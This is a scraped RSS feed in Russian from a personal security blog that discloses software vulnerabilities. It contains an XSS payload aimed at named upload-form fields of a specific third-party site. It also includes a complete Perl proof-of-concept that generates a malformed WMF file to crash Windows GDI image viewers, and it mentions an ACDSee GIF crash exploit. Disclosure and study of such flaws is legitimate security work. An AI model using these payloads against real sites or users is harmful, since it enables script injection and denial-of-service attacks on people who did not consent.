http://www.securitylab.ru/blog/personal/DoS_in_WMF/ http://www.securitylab.ru/blog/personal/DoS_in_WMF/ ru http://backend.userland.com/rss2 Fri, 03 Sep 2010 12:32:29 +0400 Активные XSS:

1. http://www.systemdk.ru/dkmodules.php?...o=add_file

Активная XSS почти во всех полях: Заголовок, Описание, Имя автора, Емайл автора, Домашняя страница, Ссылка на файл. Самое удобное для внедрения скрипта поле "Домашняя страница".)

http://"style="background:url(javascript:alert(1))/**

[URL=http://www.securityblogs.ru/index.php?act=1&id=1]Подробнее>>[/URL
Подробнее...]]> http://www.securitylab.ru/blog/personal/DoS_in_WMF/3775.php http://www.securitylab.ru/blog/personal/DoS_in_WMF/3775.php Sat, 05 Jan 2008 00:10:32 +0300 Размер блока - Block Size в корректном gif-файле всегда равняется 4 и для меня остаётся загадкой, почему программисты из компании ACD Systems решили брать это значение из GIF файла.
Эксплоит: acdsee_dos.c
Подробнее...]]> http://www.securitylab.ru/blog/personal/DoS_in_WMF/3765.php http://www.securitylab.ru/blog/personal/DoS_in_WMF/3765.php Fri, 04 Jan 2008 00:19:58 +0300 SecurityBlogs
Подробнее...]]> http://www.securitylab.ru/blog/personal/DoS_in_WMF/3415.php http://www.securitylab.ru/blog/personal/DoS_in_WMF/3415.php Thu, 22 Nov 2007 06:37:12 +0300
Удаленный пользователь может с помощью специально сформированного изображения вызвать отказ в обслуживании приложения, использующего уязвимую библиотеку.
Это происходит при отображении ESCAPE-метазаписи (фунция STARTDOC)так как, не инициализированый адреса импорта функции SeekPrinter из winspool.drv.
Уязвимыми оказываются не только приложения успользующие напрямую GDI, но и приложения использующие функции shimgvw.dll как "высокоуровневой обёртки" GDI, такие как "Программа просмотра изображений и факсов" и Windows Explorer.
Способов устранения уязвимости не существует в настоящее время.

Эксплоит:

#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by AzM";
print "\n\ngenerating crash.wmf...";
open(WMF, ">./crash.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x01\x00\x84\x43\x0­0\x00";
print WMF "\x00\x00\x10\x00\x00\x00\x26\x06\x0A\x00\x16\x00\x90\x90\x9­0\x90";
print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9­0\x90";
print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x0­3\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "Ok\n";

Подробнее...]]> http://www.securitylab.ru/blog/personal/DoS_in_WMF/681.php http://www.securitylab.ru/blog/personal/DoS_in_WMF/681.php Thu, 22 Feb 2007 09:04:30 +0300